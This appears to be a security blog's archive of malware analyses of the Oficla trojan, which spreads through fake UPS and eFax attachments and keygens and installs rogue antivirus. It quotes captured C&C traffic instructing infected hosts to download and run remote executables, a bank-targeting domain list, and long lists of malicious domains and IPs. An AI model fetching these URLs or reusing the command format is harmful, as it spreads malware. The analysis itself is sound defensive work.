Tag Archives: oficla trojan

Fake UPS ZIP Attachments Spreads Oficla Trojan

Some users have submitted us few malware samples, received as attachments in email addresses related to fake UPS spam emails. The files are ZIP archives that contain an executable file that has the same icon as Microsoft Words documents:

Extracted EXE File

File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 on 16 (31%)
Status: INFECTED

Files created after the execution of the EXE file:

Files Created

File name: svrwsc-exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: sbxj-lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: ex-08-exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 on 16 (13%)
Status: INFECTED

The file that has been created in system directory is named sbxj.lyo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software named Security Tool.

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/morph.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:45 GMT
Content-Disposition: attachment; filename="morph.exe"
Content-Transfer-Encoding: binary
Content-Length: 62464
Content-Type: application/octet-stream

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/69.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:47 GMT
Content-Disposition: attachment; filename="69.exe"
Content-Transfer-Encoding: binary
Content-Length: 15360
Content-Type: application/octet-stream

From the above network traffic we can see that the main executable file of Oficla trojan has started to receive commands from the C&C server to download two new malicious executable files, named morph.exe and 69.exe, and to execute the newly downloaded files in the victim’s computer.

Network Traffic:

GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0
Host: 188.65.74.163

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 987648
Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT

The file avpsoft_dfhljkghsdflg.exe is the executable of the rogue security software, that will be installed in our infected system, named Security Tool. After its execution, we noticed new popup windows come up:

Popup Window

Security Tool has been fully installed:

Security Tool GUI

Files created during the installation of Security Tool:

Documents and Settings\user\Local Settings\Application Data\2730621030.exe
Documents and Settings\user\Start Menu\Programs\Security Tool.lnk

File name: 2730621030-exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 on 16 (13%)
Status: INFECTED

Network Traffic:

POST /us/federal/index.php HTTP/1.0
Accept: */*
Host: padreim. ru

Response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6191
 
.%......L.....*ebc_ebc1961*......*cibng.ibanking-services.com*......*springbankconnect.com*......*ibanking-services.com*......*mystreetscape.com*......*/inets/Login*......*business.macu.com*......*cnbsec1.cnbank.com*..
...*cnbank.com*......*scottvalleybank*......*hillsbank*..
...*efirstbank*......*addisonavenue.com*......*secure.fundsxpress.com*......*site-secure.com*......*umpquabank.com*......*fundsxpress.com*......*mystreetscape*......*treasurypathways.com*......*secure.ally.com*......*bankonline.umpquabank.com*......*servlet/teller*..
...*nsbank.com*......*comerica.com*......*cashmgt.firsttennessee*......*securentry.calbanktrust.com*..
...*securentry*......*express.53.com*......*homebank.nbg.gr*......*online.ccbank.bg*......*hsbc*......*ebanking.eurobank.gr*......*itreasury.regions.com*......*/Common/SignOn/Start.asp*......*wellsoffice.wellsfargo.com*......*chsec.wellsfargo.com*..
...*telepc.net*......*ceowt.wellsfargo.com*......*enterprise2.openbank.com*......*global1.onlinebank.com*..
...*webexpress*......*/sbuser/*..
...*webcash*......*www2.firstbanks.com/olb*..
...*bxs.com*......*PassMarkRecognized.aspx*......*businesslogin*..
...*hbcash.exe*......*otm.suntrust.com*......*wire*......*ACH*..
...*/inets/*..
...*corpACH*......*wcmfd/wcmpw/*..	...*/IBWS/*......*/ibs.*..
...*/livewire/*..	...*/olbb/*......*singlepoint.usbank.com*......*bolb.associatedbank.com*..*...*fnfgbusinessonline.enterprisebanker.com*......*lakecitybank.webcashmgmt.com*..
...*/inets/*......*bob.sovereignbank.com

The malware want to filter domains related to bank accounts…

Network Traffic:

GET /outlook.exe HTTP/1.0
Host: 109.196.143.135

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.34
Date: Wed, 20 Oct 2010 15:57:51 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT
Accept-Ranges: bytes

Security Tool try to connect to a fraudulent payment system:

GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: fastpayform. biz

The title of the HTML page is:

<title>Security Tool - Payment Page</title>

Network Traffic:

GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: 77.78.201.23

Domain & IP Analysis:

webauc. ru85.195.104.162
91.204.48.46 – –
188.65.74.163 – –
109.196.143.135 – –
fastpayform. biz195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba

eFax False Email Spreads Antimalware Doctor

We have received today morning an interesting email from eFax (fake), with a suspicious ZIP Archive file (.ZIP) attached, and the subject of the email stated we have received a fax “You’ve got a fax” … the strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS WORD.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED

The details of the message source of the received emails are as follow:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;

We have executed the file in our sandbox and this is the file activity:

Image

The file that has been created in system directory is named hyli.igo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of oficla trojan to receive new commands from the bot owner and from the reponse of the GET query we can see that the malware received the commands to update itself “upd:1” with a new binary file located at “backurls:”.

And now we noticed that the oficla trojan started to download the Antimalware Doctor installer, we can see from the image below that it looks like an installer for the Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:

Image

Common symptoms of a rogue security software infection are always the repeated false security alerts that state the user’s system is infected by a large numbers of trojans and the user is then forced to click the button “Remove Threats” that will open the main program while execute a fakse system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor started to display fake security alerts that redirected to the website used to purchase this rogue security software, take in mind all the payment systems used by these rogues are fraudulent and in most cases can even steal credit card details that have been inserted during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains logged by internal honeypots and submitted by users, used to spread trojans, rogue security software and other malicious threats, some domains have a low detection rate as of today:

Rogue Security Software:

www4.checkpc96.co.cc / 209.212.149.23
www4.checkpc97.co.cc / 209.212.149.23
www4.checkpc98.co.cc / 209.212.149.23
www4.checkpc95.co.cc / 209.212.149.23
www4.checkpc94.co.cc / 209.212.149.23
www4.checkpc93.co.cc / 209.212.149.23
www1.makeptotect79.co.cc / 94.228.220.117
www1.makeptotect78.co.cc / 94.228.220.117
www1.makeptotect77.co.cc / 94.228.220.117
www1.makeptotect76.co.cc / 94.228.220.117
www1.makeptotect75.co.cc / 94.228.220.117
www1.makeptotect74.co.cc / 74.3.166.117
www1.makeptotect73.co.cc / 74.3.166.117
www1.makeptotect72.co.cc / 74.3.166.117
www1.makeptotect71.co.cc / 74.3.166.117
www1.makeptotect70.co.cc / 74.3.166.117

Trojan Distribution (Oficla/Renos):

gourlz.net / 178.63.3.138
thestockfiles.com / 69.10.36.218
vo2ov.com / 95.211.10.178
cvaohn.org / 209.123.181.48
mechadairysystems.com / 208.87.240.230
longsoft.org / 64.21.53.43
kenborden.com / 209.123.181.48
hotworldmedia.com / 69.10.36.218

Infected Websites:

absfixer.com/catalog/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
demo.itlinkonline.com/tcartz2/images/news.php?page=keyword (200 OK)
meyal.com/images/news.php?page=keyword (200 OK)
delisuper.com/images/page.php?page=keyword (200 OK)
antoniasecrets.com/catalog/images/news.php?page=keyword (200 OK)
ap2.dataoz.com/catalog/images/page.php?page=keyword (200 OK)
shylittle.com/catalog/images/page.php?page=keyword (200 OK)
dtechsac.com/tienda/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
donegalanglingcentre.com/shop/images/page.php?page=keyword (200 OK)
gravure3d.fr/catalog/images/page.php?page=keyword (200 OK)
exerciseelite.com/images/news.php?page=keyword (200 OK)
econdbike.it/negozio/images/news.php?page=keyword (200 OK)
seobrand.net/private_label/images/news.php?page=keyword (200 OK)

The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) looks like to have hosted and to actually host a very high number of malicious domains that are mostly used to distribute trojans as keygen or cracks for popular commercial software:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
allmusic.com.ua
amorphia.com.ua
artsofboreal.com
botaime.com
c-charts.com
cflor.org
creaweblog.com
cvaohn.org
digitaldepotstore.net
dwrz.com.ua
gsis-bro.com
imvu.com.ua
ineverforget.com
job-hotel.com.ua
k-p.km.ua
kenborden.com
loweimages.com
mail.allmusic.com.ua
mail.amorphia.com.ua
mail.artsofboreal.com
mail.creaweblog.com
mail.cvaohn.org
mail.digitaldepotstore.net
mail.dwrz.com.ua
mail.gsis-bro.com
mail.imvu.com.ua
mail.ineverforget.com
mail.job-hotel.com.ua
mail.k-p.km.ua
mail.kenborden.com
mail.maple-shion.net
mail.newlife3o.com
mail.obama4.in.ua
mail.obogreva.net
mail.pekinform.com.ua
mail.pill-flag.com
mail.ranta-kone.com
mail.serce.com.ua
mail.setite.com
mail.snak.vn.ua
mail.techwave.com.ua
mail.toptvproduct.ru
mail.ukreunov.com.ua
mail.xocit.com
mail.yazv.net
nasharu.org
newenglandgroup.us
newlife3o.com
ns1.obama4.in.ua
ns1.snak.kiev.ua
obama4.in.ua
pekinform.com.ua
pill-flag.com
ranta-kone.com
serce.com.ua
snak.vn.ua
techwave.com.ua
toptvproduct.ru
ukreunov.com.ua
www.botaime.com
www.dwrz.com.ua
www.ineverforget.com
www.loweimages.com
www.nasharu.org
www.xwarezzz.com
xwarezzz.com
yazv.net

Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

Also the IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) looks like to host malicious domains, in particular longsoft.org that is used to distribute trojans by promising keygens and craks for software:

Trojan spreading in action:

Image

Report 2010-08-19 15:09:47 (GMT 1)
File Name paragon.exe
File Size 135168 bytes
File Type Executable File (EXE)
MD5 Hash f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 ( 19 %)
Status INFECTED

Trojan Activity:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)		
 
POST /logos/XXX
Host: devtempest.com (91.188.60.233)
 
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)
 
POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)

1
2
3
4
5
6
7
longsoft.org
mail.longsoft.org
mail.real-downloads.net
mail.thenewamsterdams.net
mail.web-zik.com
real-downloads.net
web-zik.com

69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)

1
2
3
4
5
6
mediaidentifier.com
movieregion.com
multimedianame.com
ns1.prominentupstairs.com
realplayerpro.com
yourreload.com

178.63.3.138 (AS24940 – Hetzner Online AG RZ)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
gourlz.net
aevitasecuritystore.com
atzan.com
buydedicated.ru
buyvps.ru
ddiscompstore.com
de2.reserver.ru
erosik.com
fasturls.net
finmill.com
funnyseo.biz
hentaix.ru
humorarchive.info
jaguarconsultant.com
keygen-crack.net
kino2012.ru
kinovam.com
mail.all4-sex.info
marconmedia.com
ns1.buydedicated.ru
photo63.www.vk.com.www2in.net
serialpost.net
sey.su
softwareserialnumbers.net
soshinenie.ru
trusted-warez.com
vadoz.ru
www.erosik.com
www.photo63.www.vk.com.www2in.net
www.soshinenie.ru
www.xmancer.org
www2in.net
xmancer.org

208.87.240.230 (AS40676 – Proxy registration for downstream)

1
2
3
4
5
6
7
8
9
10
11
12
13
bigbizoo.net
grosskopf.net
grrrey.com
mail.konseed.org
mail.richfootball.net
ns1.richfootball.net
ns2.richfootball.net
pixelfish.net
richfootball.net
setite.com
theapps.org
www.setite.com
xocit.com

217.23.5.74 (AS49981 – WorldStream)

1
2
3
4
billgable.com
dlov.org
softwareshare.org
techrev.net

8.14.147.235 (AS26481 – BONDWEB Bondweb)

1
2
3
4
5
6
7
8
9
10
11
12
13
directdownloads.ws
loaded.ws
mail.directdownloads.ws
mail.loaded.ws
mail.skinnyrons.com
mail.unlimitedserials.com
skinnyrons.com
unlimitedserials.com
warez411.com
loaded.ws
unlimitedserials.com
warez411.com
unlimitedserials.com

69.55.50.102 (AS23393 – ISPRIME , Inc.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
kevin.internal.realitychecknetwork.com
mail.fulldownload.ws
rcn560.realitychecknetwork.com
sharingaccess.com
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
sharingaccess.com
sharingnova.com

We will stop here for now, but list is very long!